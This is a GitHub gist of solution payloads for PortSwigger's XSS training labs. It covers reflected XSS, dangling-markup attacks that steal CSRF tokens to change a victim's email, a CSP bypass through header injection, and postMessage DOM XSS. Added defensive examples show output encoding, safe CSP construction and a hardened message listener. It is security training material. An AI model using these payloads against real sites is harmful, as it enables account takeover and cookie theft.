@ChrisPritchard
Last active September 19, 2023 01:54
Solution sketchbook for Portswigger's new XSS labs (the new-new ones).

Reflected XSS into HTML context with most tags and attributes blocked

Put this in the exploit server body and 'deliver to victim' (change the host to your lab host):

<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E"  width=300 id="frame" onload="this.width = 500"></iframe>

Reflected XSS protected by CSP, with dangling markup attack

Step 1: get the CSRF token by using the exploit server to deliver the following to the victim (replace the lab and exploit server URLs):

<script>
document.location.href="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email?email=blag%22%3E%3Ctable%20background=%27https://ace71f031efe70a080702c43015d00b1.web-security-academy.net?"
</script>

The token will show up in the logs.

Step 2: deliver the following to the victim (replace the CSRF token and the lab server URL):

<form method="post" name="evilform" action="https://ac931fff1e0e704f80cd2c9100080039.web-security-academy.net/email/change-email">
<input type="hidden" name="csrf" value="Hd9l1m0c3zWpghPPTcP2XXqFD2wL6M2M" />
<input type="hidden" name="email" value="evil@evil.com" />
</form>
<script>document.forms['evilform'].submit()</script>

Reflected XSS protected by very strict CSP, with dangling markup attack

Set the exploit payload to the following (with the exploit and lab hosts changed), then deliver to victim:

<form name="evilform" method="post" action="https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email/change-email">
<input type="hidden" id="csrf" name="csrf" value="" />
<input type="hidden" name="email" value="evil@evil.com" />
</form>
<script>
var token = "name=\"csrf\" value=\"";
// window.name is empty on the first visit, so send the victim to the lab page
if (name.indexOf(token) <= 0) {
    document.location = "https://ac891fc51f1a9a4480d885df006900f7.web-security-academy.net/email?email=test%22%3E%3Ca%20href=%22https://ac411ff51fb79a6080a585620112003f.web-security-academy.net/exploit%22%3EClick%20me!%3C/a%3E%3Cbase%20target=%27blag";
} else {
    // second visit: window.name carries the captured markup, extract the token from it
    var loc = name.indexOf(token) + token.length;
    var csrf = name.substring(loc);
    csrf = csrf.substring(0, csrf.indexOf("\""));
    document.getElementById('csrf').value = csrf;
    document.forms['evilform'].submit();
}
</script>

How does it work? The script checks whether the current frame's name (window.name) contains a CSRF token. If not, the user is redirected to the lab's email page, where a reflected XSS creates a 'click me' link and a dangling-markup attack via an unterminated <base target> captures the rest of the page (including the CSRF token) into the target's window name. On clicking, the user is sent back to the exploit page, where the token is extracted from window.name and the form is submitted to change their email.
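
The fix for all three reflected labs above is the same: encode the reflected value for the HTML context it lands in, so a quote can never close the attribute (dangling markup) and a '<' can never open a new tag (the body onresize payload). The following is an added example, not code from the gist or the lab; the template strings, attacker host and helper names are assumptions made for illustration.

```javascript
// Added example (not from the gist): contextual output encoding for reflected values.
// Encoding the five HTML-significant characters neutralises both tag injection
// (lab 1) and attribute breakout / dangling markup (labs 2 and 3).
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function encodeForHtml(value) {
  // String() first so numbers/undefined never bypass the replace
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical search-result template: the term lands in HTML body text.
function renderSearchResult(term) {
  return "<h1>0 search results for '" + encodeForHtml(term) + "'</h1>";
}

// Hypothetical pre-filled e-mail field: the value lands inside a double-quoted attribute.
// Always quote the attribute; an unquoted attribute would still be breakable by a space.
function renderEmailInput(email) {
  return '<input type="email" name="email" value="' + encodeForHtml(email) + '">';
}

// Self-check used in tests: count opening tags in the rendered HTML.
// A correctly encoded render contains exactly the tags the template itself wrote.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed hostile inputs, mirroring the shapes the labs reflect.
const TAG_INJECTION = '<body onresize="alert(1)">';
const ATTRIBUTE_BREAKOUT = "x\"><table background='https://attacker.example/?";
```

Run under Node, renderSearchResult(TAG_INJECTION) and renderEmailInput(ATTRIBUTE_BREAKOUT) each contain a single tag, the one the template wrote; the hostile characters survive only as entities. The CSP in labs 2 and 3 is defence in depth; it is not a substitute for this encoding.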

Reflected XSS protected by CSP, with CSP bypass

Just set the url to: https://aca61fea1e9ec7bd80295df8004a0073.web-security-academy.net/?search=%3Cscript%3Ealert(1)%3C/script%3E&token=;%20script-src-elem%20%27unsafe-inline%27

It uses a reflected XSS vector in the search box to print a script tag with an alert, and uses the token query string, which is reflected into the CSP header, to append a directive that allows inline script tags.
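
The root cause is a request parameter concatenated into the Content-Security-Policy header: a value containing ';' ends the current directive and starts a new one. The following added example (not the lab's or the gist's code) contrasts that pattern with the fix; the exact directive set and the report-uri path are assumptions about the lab's header, and the small CSP parser is only there to show what a browser would see.

```javascript
// Added example (not from the gist): assembling a CSP header from an untrusted value.

// Assumed shape of the vulnerable header: the token is pasted in raw.
function buildCspUnsafe(token) {
  return "default-src 'self'; script-src 'self'; report-uri /csp-report?token=" + token;
}

// Hardened: the value is percent-encoded as a query-string component, so ';',
// spaces and quotes are inert and can never act as directive separators.
function buildCspSafe(token) {
  return "default-src 'self'; script-src 'self'; report-uri /csp-report?token=" + encodeURIComponent(token);
}

// Minimal CSP directive parser (assumption: ';'-separated directives,
// whitespace-separated source tokens), enough to inspect the result.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0]] = tokens.slice(1);
  }
  return policy;
}

// Does the policy permit inline <script> elements? script-src-elem takes
// precedence over script-src, which takes precedence over default-src.
function allowsInlineScript(policy) {
  const src = policy['script-src-elem'] || policy['script-src'] || policy['default-src'] || [];
  return src.includes("'unsafe-inline'");
}

// Constructed hostile parameter value of the kind the lab URL above carries.
const HOSTILE_TOKEN = "; script-src-elem 'unsafe-inline'";
```

With HOSTILE_TOKEN, buildCspUnsafe yields a policy in which script-src-elem allows inline scripts, while buildCspSafe keeps the whole value inside the report-uri URL. In practice the safer design is to not put request-controlled data in the header at all; if a per-request value is needed, generate it server-side.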

DOM XSS using web messages

Deliver this to the victim (with the server URL changed). An img tag is used because a script tag inserted via innerHTML is not executed:

<iframe src="https://acb51f721fd0b337808c671c00700072.web-security-academy.net" onload="this.contentWindow.postMessage('<img src=blag onerror=alert(document.cookie) />','*')"> 

DOM XSS using web messages and a JavaScript URL

Deliver this (with the server URL changed). It works because javascript: URLs are accepted in the href, which runs JS on the current page:

<iframe src="https://ac6e1f531ec5c6f5801a86ee009d00d3.web-security-academy.net" onload="this.contentWindow.postMessage('javascript:alert(document.cookie)//http:','*')"> 

DOM XSS using web messages and JSON.parse

Deliver this to the victim. Note the use of &quot; to get quotes inside the nested JavaScript. Also, with this iframe src, alert(xss) didn't work but alert(document.cookie) did, which is interesting.

<iframe src="https://ac331fd21e7b389f806fa34900380092.web-security-academy.net/" onload="this.contentWindow.postMessage('{&quot;type&quot;:&quot;load-channel&quot;,&quot;url&quot;:&quot;javascript:alert(document.cookie)&quot;}','*')" />
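
All three web-message labs share two defects in the receiving page: the message listener accepts any origin, and the message content goes straight into a dangerous sink (innerHTML or location.href). The following is an added example of a hardened listener, not the labs' code; the trusted origins, message types and element id are assumptions. The decision logic is kept in pure functions so it runs and can be tested under Node without a DOM.

```javascript
// Added example (not from the gist): defensive handling of postMessage data.

// Hypothetical allowlist of origins permitted to send us messages.
const TRUSTED_ORIGINS = new Set(['https://app.example', 'https://cdn.example']);

// Accept only http(s) navigation targets; "javascript:..." and "data:..." are rejected.
function isSafeNavigationUrl(candidate) {
  let url;
  try {
    url = new URL(String(candidate), 'https://app.example/'); // base origin is hypothetical
  } catch (e) {
    return false;
  }
  return url.protocol === 'https:' || url.protocol === 'http:';
}

// Returns an action object, or null when the message must be dropped.
function decideAction(origin, rawData) {
  if (!TRUSTED_ORIGINS.has(origin)) return null;          // reject unknown senders first
  let msg;
  try {
    msg = typeof rawData === 'string' ? JSON.parse(rawData) : rawData;
  } catch (e) {
    return null;                                            // malformed JSON is dropped, never eval'd
  }
  if (!msg || typeof msg !== 'object') return null;
  switch (msg.type) {
    case 'load-channel':
      return isSafeNavigationUrl(msg.url) ? { kind: 'navigate', url: String(msg.url) } : null;
    case 'show-text':
      return typeof msg.text === 'string' ? { kind: 'text', text: msg.text } : null;
    default:
      return null;                                          // unknown types are ignored
  }
}

// Browser wiring (skipped under Node): text is written with textContent, never innerHTML,
// so markup in the message is displayed literally rather than parsed.
if (typeof window !== 'undefined') {
  window.addEventListener('message', (event) => {
    const action = decideAction(event.origin, event.data);
    if (!action) return;
    if (action.kind === 'navigate') location.href = action.url;
    else document.getElementById('ads').textContent = action.text;
  });
}

// Constructed inputs mirroring the three payload shapes above.
const FROM_UNTRUSTED = ['https://attacker.example', '{"type":"load-channel","url":"https://app.example/x"}'];
const JS_URL = ['https://app.example', '{"type":"load-channel","url":"javascript:alert(document.cookie)"}'];
const MARKUP_TEXT = ['https://app.example', { type: 'show-text', text: '<img src=x onerror=alert(1)>' }];
```

Origin checking stops the '*'-targeted iframe postMessage entirely, the URL scheme check stops the javascript: variant even from a trusted sender, and textContent stops the img/innerHTML variant by treating the string as text. Check event.origin against an allowlist, not a substring match (e.g. indexOf of the expected host), which is itself a common bypass.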

DOM-based cookie manipulation

Deliver the following. The product page stores the current URL in a cookie, then the home page uses this value as part of innerHTML. So I create a URL for the product page that includes a closing quote and an XSS image tag to alert the cookie. Worked great :)

Notably, the iframe loads the product page to set the cookie and, once loaded, navigates the top-level page to the exploitable home page: a two-step manipulation.

<iframe src="https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net/product?productId=1&%27%3E%3Cimg%20src=blag%20onerror=alert(document.cookie)%20/%3E" onload="document.location.href='https://ac601f521e2338cb80c4a9c0002c00f8.web-security-academy.net'" />

@aesop007

Thanks for the write-up... Just started learning about xss not too long ago and I am confused as to why we have to use an exploit server to complete it and why it doesn't run directly through the site. Thanks in advance for your help :)

This Lab - Reflected XSS into HTML context with most tags and attributes blocked

@localhost-MouhannadlrX
WTF!!!!!!!
